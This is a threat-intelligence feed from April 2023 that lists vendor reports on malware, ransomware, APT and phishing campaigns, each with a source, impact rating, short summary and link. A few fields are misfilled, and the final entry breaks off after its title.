Date of Scan:: 2023-04-22

Impact:: MEDIUM

Summary:: Researchers from Welivesecurity identified a new Lazarus campaign considered part of "Operation DreamJob" has been discovered targeting Linux users with malware for the first time.

Source: https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack/

Intel Source:: Fortinet

Intel Name:: The_Examination_of_EvilExtractor_Tool

Date of Scan:: 2023-04-22

Impact:: MEDIUM

Summary:: FortiGuard Labs researchers have analyzed the EvilExtractor tool which is an attack tool designed to target Windows operating systems and extract data and files from endpoint devices. Also, observed this malware in a phishing email campaign on 30 March.

Source: https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer

Intel Source:: Sucuri

Intel Name:: Hackers_Using_Abandoned_WordPress_Plugins_to_Backdoor_Websites

Date of Scan:: 2023-04-21

Impact:: LOW

Summary:: Sucuri researchers have identified that attackers are using Eval PHP, an outdated legitimate WordPress plugin, to compromise websites by injecting stealthy backdoors.

Source: https://blog.sucuri.net/2023/04/massive-abuse-of-abandoned-evalphp-wordpress-plugin.html

Intel Source:: Sophos

Intel Name:: EDR_Killer_AuKill_Exploiting_Process_Explorer_Drivers

Date of Scan:: 2023-04-21

Impact:: MEDIUM

Summary:: Sophos researchers have investigated multiple incidents where attackers attempted to disable EDR clients with a new defense evasion tool dubbed AuKill. The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.

Source: https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/

Intel Source:: Google Blog

Intel Name:: Russian_Hackers_Conducting_Phishing_Attacks_in_Ukraine

Date of Scan:: 2023-04-21

Impact:: LOW

Summary:: Google Threat Analysis researchers have observed that Russian government-backed phishing campaigns targeted users in Ukraine the most, with the country accounting for over 60% of observed Russian targeting.

Source: https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/

Intel Source:: CSIRT-MON

Intel Name:: Belarus_Linked_Hacking_Group_Targeting_Poland_With_New_Disinformation_Campaign

Date of Scan:: 2023-04-21

Impact:: MEDIUM

Summary:: CSIRT-MON researchers have issued a warning Wednesday about a recent disinformation campaign that has been traced back to the Belarusian hacking group known as Ghostwriter.

Source: https://csirt-mon.wp.mil.pl/pl/articles/6-aktualnosci/dezinformacja-o-rekrutacji-do-litpolukrbrig/

Intel Source:: Symantec

Intel Name:: Play_Ransomware_Group_Using_New_Custom_Data_Gathering_Tools

Date of Scan:: 2023-04-21

Impact:: MEDIUM

Summary:: Symantec researchers have identified that the Play ransomware group is using two new, custom-developed tools that allow it to enumerate all users and computers on a compromised network, and copy files from the Volume Shadow Copy Service (VSS) that are normally locked by the operating system.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy

Intel Source:: Team-Cymru

Intel Name:: SideCopy_Attack_Chain_Deploying_AllaKore_RAT

Date of Scan:: 2023-04-21

Impact:: LOW

Summary:: Researchers from Team-Cymru have analyzed the SideCopy group and discovered the SideCopy attack chain used to deploy AllaKore RAT. It is an open-source remote access tool that has been modified for the purposes of SideCopy operations and is commonly observed in their intrusions.

Source: https://www.team-cymru.com/post/allakore-d-the-sidecopy-train

Intel Source:: ASEC

Intel Name:: Distribution_of_the_BlackBit_ransomware

Date of Scan:: 2023-04-21

Impact:: LOW

Summary:: AhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of the BlackBit ransomware disguised as svchost.exe during the team’s monitoring. According to the ASEC’s internal infrastructure, the BlackBit ransomware has been continuously distributed

Source: https://asec.ahnlab.com/en/51497/

Intel Source:: Symantec

Intel Name:: Daggerfly_APT_Group_Targeting_Telecoms_Company_in_Africa

Date of Scan:: 2023-04-21

Impact:: LOW

Summary:: Researchers from Symantec have identified that Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot

Intel Source:: Threatmon

Intel Name:: New_Attack_Chain_Uncovered_From_Blind_Eagle_Cyber_Espionage_Group

Date of Scan:: 2023-04-21

Impact:: LOW

Summary:: Researchers from Threatmon have observed that the cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.

Source: https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/

Intel Source:: PaloAlto

Intel Name:: Hackers_Promptly_Adopting_Web3_IPFS_Technology

Date of Scan:: 2023-04-21

Impact:: LOW

Summary:: PaloAlto researchers have observed several types of cyberthreats using InterPlanetary File System (aka IPFS), including phishing, credential theft, command and control (C2) communications, and malicious payload distribution. Also, observed a significant jump in IPFS-related traffic at the beginning of 2022.

Source: https://unit42.paloaltonetworks.com/ipfs-used-maliciously/

Intel Source:: Secureworks

Intel Name:: Bumblebee_Malware_Distributing_Via_Trojanized_Installer_Downloads

Date of Scan:: 2023-04-21

Impact:: MEDIUM

Summary:: https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads

Source: https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads

Intel Source:: NTT Security

Intel Name:: USB_Based_FlowCloud_Malware_Attacks

Date of Scan:: 2023-04-21

Impact:: LOW

Summary:: Researchers from NTT security have observed several companies have been infected with FlowCloud. It is known as malware used by an attack group called TA410 and has been observed since around 2019.

Source: https://insight-jp.nttsecurity.com/post/102id0t/usbflowcloud

Intel Source:: LOW

Intel Name:: Phishing_Campaign_Targeting_EPOS_Net_Customers

Date of Scan:: 2023-04-20

Impact:: LOW

Summary:: Cofense Phishing Defense Center have observed a sophisticated phishing campaign targeting EPOS Net customers, a large Japanese credit card company. The campaign is notable for its meticulously crafted emails and cloned website, as well as its use of official customer service numbers to establish an illusion of legitimacy.

Source: https://cofense.com/blog/double-trouble-unmasking-the-epos-net-phishing-scheme-that-turns-trust-against-you/

Intel Source:: Uptycs

Intel Name:: Hackers_From_Pakistan_Using_Linux_Malware_Poseidon_to_Target_Indian_Government_Agencies

Date of Scan:: 2023-04-20

Impact:: MEDIUM

Summary:: Researchers from Uptycs have identified a Pakistan-based advanced persistent threat actor known as Transparent Tribe using a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.

Source: https://www.uptycs.com/blog/cyber_espionage_in_india_decoding_apt_36_new_linux_malware

Intel Source:: Blackberry

Intel Name:: Google_Ads_Abuse_and_Spear_Phishing_Campaigns_Impersonating_Spains_Tax_Agency

Date of Scan:: 2023-04-20

Impact:: LOW

Summary:: Researchers from BlackBerry have observed two parallel malicious campaigns that use the same infrastructure but have different purposes. The first campaign is related to a malvertising Google Ads Platform and the second campaign is related to a massive spear-phishing campaign targeting large organizations based in Spain. The campaign impersonated Spain’s tax agency, with the goal of harvesting the email credentials of companies in Spain.

Source: https://blogs.blackberry.com/en/2023/04/massive-spear-phishing-campaign-impersonating-spain-tax-agency

Intel Source:: Cyble

Intel Name:: New_Strain_of_Ransomware_Named_CrossLock

Date of Scan:: 2023-04-20

Impact:: LOW

Summary:: Cyble researchers have discovered a new strain of ransomware called CrossLock, which is written in the programming language “Go”. It employs the double-extortion technique to increase the likelihood of payment from its victims and this technique involves encrypting the victim’s data as well as exfiltrating it from their system.

Source: https://blog.cyble.com/2023/04/18/crosslock-ransomware-emerges-new-golang-based-malware-on-the-horizon/

Intel Source:: Morphisec

Intel Name:: The_Critical_Component_of_Aurora_Stealer_Attack_Delivery_Chain

Date of Scan:: 2023-04-19

Impact:: LOW

Summary:: Morphisec researchers have observed the component that makes Aurora’s delivery stealthy and dangerous is a highly evasive loader named “in2al5d p3in4er.” It is compiled with Embarcadero RAD Studio and targets endpoint workstations using advanced anti-VM (virtual machine) techniques.

Source: https://blog.morphisec.com/in2al5d-p3in4er

Intel Source:: Microsoft

Intel Name:: Attacking_High_Value_Targets_With_Mint_Sandstorm

Date of Scan:: 2023-04-19

Impact:: MEDIUM

Summary:: Microsoft researchers have observed a mature subgroup of Mint Sandstorm, an Iranian nation-state actor previously tracked as PHOSPHORUS, refining its tactics, techniques, and procedures (TTPs). Specifically, this subset has rapidly weaponized N-day vulnerabilities in common enterprise applications and conducted highly-targeted phishing campaigns to quickly and successfully access environments of interest.

Source: https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/

Intel Source:: Zscaler

Intel Name:: A_New_Backdoor_Called_Devopt

Date of Scan:: 2023-04-19

Impact:: LOW

Summary:: Zscaler ThreatLabz researchers have identified a new backdoor called 'Devopt'. It utilizes hard-coded names for persistence and offers several functionalities, including keylogging, stealing browser credentials, clipper, and more. Multiple versions of the backdoor have surfaced in just the last few days, indicating that it is still in development.

Source: https://www.zscaler.com/blogs/security-research/introducing-devopt-multifunctional-backdoor-arsenal

Intel Source:: ASEC

Intel Name:: The_Activities_of_Tick_Group

Date of Scan:: 2023-04-18

Impact:: LOW

Summary:: Researchers from ASEC have continued to track Tick group activities as it is targeting government agencies, the military, and various industries in Korea and Japan for over a decade.

Source: https://asec.ahnlab.com/en/51340/

Intel Source:: Group-IB

Intel Name:: Hackers_From_Iran_Leveraging_SimpleHelp_Remote_Support_Software_for_Persistent_Access

Date of Scan:: 2023-04-18

Impact:: MEDIUM

Summary:: Researchers from Group-IB have identified that the Iranian threat actor known as MuddyWater is continuing its time-tested tradition of relying on legitimate remote administration tools to commandeer targeted systems.

Source: https://www.group-ib.com/blog/muddywater-infrastructure/

Intel Source:: Eclecticiq

Intel Name:: Gamaredon_Groups_Automated_Spear_Phishing_Campaigns_Revealed_by_Exposed_Web_Panel

Date of Scan:: 2023-04-18

Impact:: MEDIUM

Summary:: EclecticIQ researchers have identified a spear phishing campaign targeting Ukrainian government entities like the Foreign Intelligence Service of Ukraine (SZRU) and the Security Service of Ukraine (SSU), likely conducted by APT group Gamaredon.

Source: https://blog.eclecticiq.com/exposed-web-panel-reveals-gamaredon-groups-automated-spear-phishing-campaigns

Intel Source:: TrendMicro

Intel Name:: The_Examination_of_BabLock_Ransomware

Date of Scan:: 2023-04-18

Impact:: LOW

Summary:: TrendMicro researchers have analyzed stealthy and expeditious ransomware called BabLock (aka Rorschach). It has recently been making waves due to its sophisticated and fast-moving attack chain that uses subtle yet effective techniques.

Source: https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html

Intel Source:: Securelist

Intel Name:: QBot_Banker_Delivering_Via_Business_Correspondence

Date of Scan:: 2023-04-18

Impact:: LOW

Summary:: Securelist researchers have observed a significant increase in attacks that use banking Trojans of the QBot family. The malware is delivered through e-mail letters written in different languages — variations of them were coming in English, German, Italian, and French. The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own.

Source: https://securelist.com/qbot-banker-business-correspondence/109535/

Intel Source:: ASEC

Intel Name:: Trigona_Ransomware_Attacking_MS_SQL_Servers

Date of Scan:: 2023-04-18

Impact:: MEDIUM

Summary:: ASEC researchers have discovered the Trigona ransomware is installed on poorly managed MS-SQL servers and typical attacks include brute force attacks and dictionary attacks to systems where account credentials are poorly being managed.

Source: https://asec.ahnlab.com/en/51343/

Intel Source:: Malware Hunter

Intel Name:: LockBit_Encryptor_Targeting_macOS_System

Date of Scan:: 2023-04-17

Impact:: MEDIUM

Summary:: Researchers from Malware Hunter team have warned that the LockBit ransomware gang has developed encryptors to target macOS devices.

Source: https://twitter.com/malwrhunterteam/status/1647384505550876675

Intel Source:: NTT Security

Intel Name:: Fraudulent_Campaign_Using_Fake_Google_Chrome_Error_to_Spread_Malware

Date of Scan:: 2023-04-17

Impact:: LOW

Summary:: Researchers from NTT security have observed an attack campaign distributing malware from a web page disguised as a Google Chrome error message since around November 2022. It has become active since around February 2023, and the attacks have been confirmed in a very wide area, so close attention is required.

Source: https://insight-jp.nttsecurity.com/post/102icvb/attack-campaign-that-uses-fake-google-chrome-error-to-distribute-malware-from-com

Intel Source:: IBM Security Intelligence

Intel Name:: Threat_Actors_From_Conti_and_FIN7_Collaborate_With_Domino_Backdoor

Date of Scan:: 2023-04-17

Impact:: MEDIUM

Summary:: Researchers from IBM security have discovered a new malware family called Domino that is created by developers associated with the cybercriminal group that X-Force tracks as ITG14, also known as FIN7.

Source: https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/

Intel Source:: ZScaler

Intel Name:: The_Analysis_of_Trigona_Ransomware

Date of Scan:: 2023-04-17

Impact:: LOW

Summary:: Zscaler researchers have analyzed the Trigona ransomware. It is written in the Delphi programming language that has been active since at least June 2022.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-trigona-ransomware

Intel Source:: Uptycs

Intel Name:: Zaraza_Bot_Credential_Stealer_Targeting_Browser_Passwords

Date of Scan:: 2023-04-17

Impact:: LOW

Summary:: Researchers from Uptycs team have identified a new variant of credential stealing malware, dubbed Zaraza bot, which is using telegram as its command and control and It is the Russian word for infection.

Source: https://www.uptycs.com/blog/zaraza-bot-credential-password-stealer

Intel Source:: Fortinet

Intel Name:: An_Overview_of_Tax_Scammers

Date of Scan:: 2023-04-17

Impact:: MEDIUM

Summary:: Fortinet researchers have analyzed a few examples of malware that take advantage of tax season. Attackers make every attempt to scam taxpayers for financial gain and data exfiltration for future attacks.

Source: https://www.fortinet.com/blog/threat-research/tax-scammers-at-large

Intel Source:: Ciberdefensa

Intel Name:: Bitter_Group_CHM_malware_distribution

Date of Scan:: 2023-04-16

Impact:: LOW

Summary:: The Bitter group has been distributing CHM malware to certain Chinese organizations through compressed email attachments with filenames such as "Project Plan 2023.chm". When executed, the CHM files display content related to Chinese and Russian organizations and activate a malicious script that executes additional malware.

Source: https://ciberdefensa.cat/archivos/10456

Intel Source:: Yoroi

Intel Name:: Money_Ransomware

Date of Scan:: 2023-04-16

Impact:: LOW

Summary:: The article discusses the Money Ransomware group, which utilizes a double extortion model by encrypting data and exfiltrating sensitive information, threatening to publish the data unless a ransom is paid.

Source: https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/?&web_view=true

Intel Source:: Microsoft

Intel Name:: Threat_Actors_Try_to_Wreak_Havoc_on_Tax_Day

Date of Scan:: 2023-04-15

Impact:: MEDIUM

Summary:: Microsoft researchers have observed phishing attacks targeting accounting and tax return preparation firms to deliver the Remcos remote access trojan (RAT) and compromise target networks beginning in February of this year.

Source: https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/

Intel Source:: Sophos

Intel Name:: Malware_Attacks_on_Tax_Firms

Date of Scan:: 2023-04-15

Impact:: LOW

Summary:: Sophos researchers have observed that a threat actor is targeting Financial accountant firms and CPAs with an attack that combines social engineering with a novel exploit against Windows computers to deliver malware called GuLoader.

Source: https://news.sophos.com/en-us/2023/04/13/tax-firms-targeted-by-precision-malware-attacks/

Intel Source:: Trellix

Intel Name:: The_Activity_of_Emerging_Cybercriminal_Group_Named_Read_The_Manual_RTM_Locker

Date of Scan:: 2023-04-15

Impact:: LOW

Summary:: Researchers from Trellix have detailed the tactics, techniques, and procedures of an emerging cybercriminal gang called ‘Read The Manual RTM Locker. The group provides a ransomware-as-a-service (RaaS) and provides its malicious code to a network of affiliates by imposing strict rules.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/read-the-manual-locker-a-private-raas-provider.html

Intel Source:: ASEC

Intel Name:: Bitter_Group_Distributing_CHM_Malware_to_Chinese_Organizations

Date of Scan:: 2023-04-14

Impact:: LOW

Summary:: Researchers from ASEC have identified multiple circumstances of the group distributing CHM malware to certain Chinese organizations. The files used in the recent attack are distributed as attachments to emails as compressed files. The compressed files contain a CHM file with different filenames.

Source: https://asec.ahnlab.com/en/51043/

Intel Source:: CERT-PL

Intel Name:: Russian_Hackers_Targeting_NATO_and_EU

Date of Scan:: 2023-04-14

Impact:: MEDIUM

Summary:: Researchers from The Military Counterintelligence Service and the CERT Polska team have observed a widespread espionage campaign linked to Russian intelligence services and targeting NATO and EU.

Source: https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services

Intel Source:: Sentinelone

Intel Name:: APT36_Group_Targeting_Indian_Education_Sector

Date of Scan:: 2023-04-14

Impact:: MEDIUM

Summary:: Researchers from SentinelOne have identified a cluster of malicious Office documents that distribute Crimson RAT, used by the APT36 group (also known as Transparent Tribe) targeting the education sector.

Source: https://www.sentinelone.com/labs/transparent-tribe-apt36-pakistan-aligned-threat-actor-expands-interest-in-indian-education-sector/

Intel Source:: CADO

Intel Name:: New_Legion_Hacktool_Stealing_Credentials_From_Misconfigured_Sites

Date of Scan:: 2023-04-14

Impact:: MEDIUM

Summary:: CADO Security researchers have identified a new Python-based credential harvester and SMTP hijacking tool named ‘Legion’ that is being sold on Telegram that targets online email services for phishing and spam attacks.

Source: https://www.cadosecurity.com/legion-an-aws-credential-harvester-and-smtp-hijacker/

Intel Source:: Esentire

Intel Name:: GuLoader_Targeting_the_Financial_Sector_Using_a_Taxthemed_Phishing_Lure

Date of Scan:: 2023-04-13

Impact:: MEDIUM

Summary:: Researchers from Esentire have observed GuLoader targeting the financial sector via the phishing email using a tax-themed lure. The phishing email contains a shared link to Adobe Acrobat, where the user can download the password-protected ZIP archive.

Source: https://www.esentire.com/blog/guloader-targeting-the-financial-sector-using-a-tax-themed-phishing-lure

Intel Source:: Netscope

Intel Name:: DigitalOceans_Tech_Support_Scam_Shifts_to_StackPaths_CDN

Date of Scan:: 2023-04-13

Impact:: MEDIUM

Summary:: Netskope researchers have identified that attackers previously abusing DigitalOcean to host a tech support scam have expanded the operation, now abusing StackPath CDN to distribute the scam, and are likely to start abusing additional cloud services to deliver the scam in the near future.

Source: https://www.netskope.com/pt/blog/tech-support-scam-pivots-from-digitalocean-to-stackpath-cdn

Intel Source:: Securinfra

Intel Name:: Chinese_Hacking_Group_Targeting_European_Governments_and_Businesses

Date of Scan:: 2023-04-13

Impact:: HIGH

Summary:: Researchers from Securinfra have observed that Chinese APT groups are targeting European governments and businesses. Recently, European Union Agency for Cybersecurity (ENISA) and CERT-EU warned about malicious activities against EU governments and businesses attributed to Chinese Advanced Persistent Threat (APT) groups.

Source: https://www.secuinfra.com/en/news/beijing-calling-chinese-apts-are-targeting-european-governments-and-businesses/

Intel Source:: Esentire

Intel Name:: Raise_in_Qakbot_Malware_Incidents

Date of Scan:: 2023-04-13

Impact:: LOW

Summary:: Researchers from Esentire have observed a significant increase in Qakbot incidents impacting various industries.

Source: https://www.esentire.com/security-advisories/increase-in-observations-of-qakbot-malware

Intel Source:: ASEC

Intel Name:: Qakbot_Distributing_via_Email_Hijacking

Date of Scan:: 2023-04-13

Impact:: LOW

Summary:: ASEC Lab researchers have identified circumstances of Qakbot malware is distributing via malicious PDF files attached to forwarded or replies to existing emails.

Source: https://asec.ahnlab.com/en/51282/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_Analyses_April_03rd_April_09th_2023

Date of Scan:: 2023-04-13

Impact:: LOW

Summary:: ASEC researchers have analyzed the malware and found backdoor ranked top with 61.1%, followed by Infostealer with 20.8%, downloader with 16.9%, and ransomware with 1.1%.

Source: https://asec.ahnlab.com/en/51274/

Intel Source:: Tehtris

Intel Name:: Color1337_Cryptojacking_Campaign_Targeting_Linux_Machines

Date of Scan:: 2023-04-13

Impact:: LOW

Summary:: Researchers from Tehtris have identified a cryptojacking campaign, believed to have originated from Romania, and targeting Linux machines. This campaign, dubbed Color1337, leverages a botnet to mine Monero and the botnet can propagate itself to other machines across the network.

Source: https://tehtris.com/en/blog/linux-focus-on-a-cryptomining-attack-dubbed-color1337

Intel Source:: NTT Security

Intel Name:: An_attack_campaign_distributing_malware_disguised_as_a_Google_Chrome

Date of Scan:: 2023-04-12

Impact:: LOW

Summary:: Since around November 2022, SOC has been observing an attack campaign distributing malware from a web page disguised as a Google Chrome error screen. It became active from around February 2023, and malware downloads have been confirmed in a very wide range, so it is necessary to be careful. This article provides an overview of the attack campaign and the malware.

Source: https://insight-jp.nttsecurity.com/post/102ic6o/webgoogle-chrome

Intel Source:: Securelist

Intel Name:: Attacks_With_Nokoyawa_Ransomware_Using_ZeroDay_Vulnerabilities_in_Windows

Date of Scan:: 2023-04-12

Impact:: MEDIUM

Summary:: Securelist researchers have analyzed the CVE-2023-28252 zero-day vulnerability in Common Log File System (CLFS).

Source: https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/

Intel Source:: ISC.SANS

Intel Name:: Recent_Activity_of_IcedID

Date of Scan:: 2023-04-12

Impact:: LOW

Summary:: Researchers from SANS have observed that IcedID (Bokbot) is distributing through thread-hijacked emails with PDF attachments. The PDF files have links that redirect to Google Firebase Storage URLs hosting password-protected zip archives and the password for the downloaded zip archive is shown in the PDF file.

Source: https://isc.sans.edu/diary/rss/29740

Intel Source:: JFrog

Intel Name:: Analyzing_Impala_Stealer

Date of Scan:: 2023-04-12

Impact:: LOW

Summary:: Reserachers from JFrog provided a detailed analysis of a malicious payload named “Impala Stealer”, a custom crypto stealer which was used as the payload for the NuGet malicious packages campaign. The sophisticated campaign targeted .NET developers via NuGet malicious packages, and the JFrog Security team was able to detect and report it as part of their regular activity of exposing supply chain attacks.

Source: https://jfrog.com/blog/impala-stealer-malicious-nuget-package-payload/

Intel Source:: Checkpoint

Intel Name:: The_discovery_of_three_vulnerabilities_in_the_Microsoft_Message_Queuing_service_MSMQ

Date of Scan:: 2023-04-12

Impact:: HIGH

Summary:: Check Point reserachers recently observed three new vulnerabilities in the “Microsoft Message Queuing” service, known as MSMQ. These vulnerabilities were disclosed to Microsoft and patched in the April Patch Tuesday update. The most severe of these, dubbed QueueJumper by CPR (CVE-2023-21554), is a critical vulnerability that could allow unauthorized attackers to remotely execute arbitrary code in the context of the Windows service process mqsvc.exe.

Source: https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/

Intel Source:: ISC.SANS

Intel Name:: The_Analysis_of_Malicious_HTA_File

Date of Scan:: 2023-04-12

Impact:: LOW

Summary:: Researchers from SANS have analyzed the malicious HTA file.

Source: https://isc.sans.edu/diary/Another+Malicious+HTA+File+Analysis+Part+2/29676/

Intel Source:: Securelist

Intel Name:: The_Development_and_Refinement_of_DeathNote_Campaign_TTPs

Date of Scan:: 2023-04-12

Impact:: MEDIUM

Summary:: Researchers from Securelist have focused on an active cluster that is dubbed DeathNote because the malware responsible for downloading additional payloads is named Dn.dll or Dn64.dll. This threat is also known as Operation DreamJob or NukeSped.

Source: https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

Intel Source:: Sygnia

Intel Name:: The_Attack_Flow_of_RagnarLocker_Ransomware

Date of Scan:: 2023-04-12

Impact:: LOW

Summary:: Researchers from Sygnia have analyzed the attack flow of RagnarLocker ransomware. It is both the name of a ransomware strain and of a criminal group that develops and operates it. Their data leakage blog appeared in April 2020, but although they’re an experienced group, RagnarLocker never made it to the top 10 ransomware strains.

Source: https://blog.sygnia.co/threat-actor-spotlight-ragnarlocker-ransomware

Intel Source:: ISC. SANS

Intel Name:: The_textwrap_wrap_function

Date of Scan:: 2023-04-12

Impact:: LOW

Summary:: Didier Stevens, Senior handler from Microsoft MVP discovered that the textwrap.wrap function he used in diary entry "String Obfuscation: Character Pair Reversal" does not always group characters as he expected. He released an update of his python-per-line.py tool, including a Reverse function. And also some simple brute-forcing.

Source: https://isc.sans.edu/diary/Extra+String+Obfuscation+Character+Pair+Reversal/29656

Intel Source:: Fortinet

Intel Name:: Malicious_Document_From_Ukraines_Energoatom_Delivering_Havoc_Demon_Backdoor

Date of Scan:: 2023-04-12

Impact:: LOW

Summary:: FortiGuard Labs researchers have identified a malicious spoofed document pretending to be from the Ukrainian company, Energoatom, a state-owned enterprise that operates Ukraine’s nuclear power plants.

Source: https://www.fortinet.com/blog/threat-research/malware-disguised-as-document-ukraine-energoatom-delivers-havoc-demon-backdoor?&web_view=true

Intel Source:: PaloAlto

Intel Name:: The_CryptoClippy_malware_campaign_targets_Portuguese_speakers

Date of Scan:: 2023-04-11

Impact:: LOW

Summary:: Unit 42 recently observed a malware campaign targeting Portuguese speakers and redirect cryptocurrency from legitimate users’ wallets and controlled by threat actors. The campaign uses a malware known as a cryptocurrency clipper, which monitors the victim’s clipboard for signs that a cryptocurrency wallet address is being copied.

Source: https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/

Intel Source:: Checkmarx

Intel Name:: Hackers_Flooding_NPM_With_Fake_Packages_Causing_DoS_Attack

Date of Scan:: 2023-04-11

Impact:: LOW

Summary:: Researchers from Checkmarx security have identified that hackers flooding the npm open source package repository for Node.js with bogus packages that briefly even resulted in a denial-of-service (DoS) attack.

Source: https://medium.com/checkmarx-security/who-broke-npm-malicious-packages-flood-leading-to-denial-of-service-77ac707ddbf1

Intel Source:: Securelist

Intel Name:: Gopuram_backdoor_deployed_through_3CX_supply_chain_attack

Date of Scan:: 2023-04-11

Impact:: MEDIUM

Summary:: On March 29, Crowdstrike posted their report about a supply chain attack conducted via 3CXDesktopApp. They analyzed the attack and shared their findings. They observed few victims compromised with Gopuram, but the number of infections began to increase in March 2023. As it turned out, the increase was directly related to the 3CX supply chain attack.

Source: https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Email_analyses_March_26_April_1_2023

Date of Scan:: 2023-04-11

Impact:: LOW

Summary:: ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 26th, 2023 to April 1st, 2023 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/51222/

Intel Source:: Trustwave

Intel Name:: A_new_strain_of_malware_Rilide_targets_Chromium_based_browsers

Date of Scan:: 2023-04-11

Impact:: LOW

Summary:: Trustwave SpiderLabs observed a new strain of malware that was named as Rilide and targets Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, and Opera. Rilide malware is pretending as a legitimate Google Drive extension and lets threat actors to carry out a big range of malicious activities, including monitoring browsing history, taking screenshots, and injecting malicious scripts to withdraw funds from various cryptocurrency exchanges.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rilide-a-new-malicious-browser-extension-for-stealing-cryptocurrencies/

Intel Source:: Cyfirma

Intel Name:: The_Deep_Analysis_Report_on_SarinLocker_Ransomware

Date of Scan:: 2023-04-11

Impact:: LOW

Summary:: Cyfirma researchers have deeply analyzed a new ransomware called SarinLocker. The group has started a ransomware affiliate program that provides attackers with ransomware and affiliate software to manage victims.

Source: https://www.cyfirma.com/outofband/sarinlocker-ransomware/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Email_analyses_March_19_25th_2023

Date of Scan:: 2023-04-10

Impact:: LOW

Summary:: ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 19th, 2023 to March 25th, 2023 and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/50789/

Intel Source:: Microsoft

Intel Name:: Ransomware_Based_Attacks_Carried_Out_by_Iranian_Hackers

Date of Scan:: 2023-04-10

Impact:: MEDIUM

Summary:: Microsoft researchers have identified the Iranian nation-state group known as MuddyWater has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation.

Source: https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/

Intel Source:: Cyble

Intel Name:: New_Ransomware_Group_Named_Money_Message

Date of Scan:: 2023-04-10

Impact:: LOW

Summary:: Cyble researchers have discovered a new ransomware group named Money Message. It can encrypt network shares and targets both Windows and Linux operating systems.

Source: https://blog.cyble.com/2023/04/06/demystifying-money-message-ransomware/\

Intel Source:: Sucuri

Intel Name:: WordPress_Infection_Campaign_Leveraging_Recently_Discovered_Theme_and_Plugin_Vulnerabilities

Date of Scan:: 2023-04-10

Impact:: LOW

Summary:: Researchers from Sucuri have tracked a massive WordPress infection campaign since 2017. Typically, they refer to it as an ongoing long lasting massive WordPress infection campaign that leverages all known and recently discovered theme and plugin vulnerabilities.

Source: https://blog.sucuri.net/2023/04/balada-injector-synopsis-of-a-massive-ongoing-wordpress-malware-campaign.html?web_view=true

Intel Source:: Trustwave

Intel Name:: Emotet_Resumed_its_Spamming_Activities

Date of Scan:: 2023-04-06

Impact:: LOW

Summary:: Researchers from Trustwave SpiderLabs have saw Emotet switch focus to using OneNote attachments, which is a tactic also adopted by other malware groups in recent months. The analysis is intended to help the cybersecurity community better understand the wider obfuscation and padding tricks Emotet is using.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/deobfuscating-the-recent-emotet-epoch-4-macro/

Intel Source:: Trellix

Intel Name:: The_functions_of_Genesis_Market

Date of Scan:: 2023-04-06

Impact:: LOW

Summary:: Trellix was approached by law enforcment asking for assistance with the analyses of Genesis Market. Trellix have analyzed and explained the function and operations of Genesis Market, as well as provided an analysis of malware samples that law enforcement shared with Trellix, advice and guidance to (potential) victims.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/genesis-market-no-longer-feeds-the-evil-cookie-monster.html

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_statistics_March_27_April_2_2023

Date of Scan:: 2023-04-06

Impact:: LOW

Summary:: ASEC lab researchers continiusly monitor malware threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post lists weekly statistics collected from March 27th, 2023 (Monday) to April 2nd, 2023 (Sunday).

Source: https://asec.ahnlab.com/en/50952/

Intel Source:: ISC. SANS

Intel Name:: The_efile_com_analyses

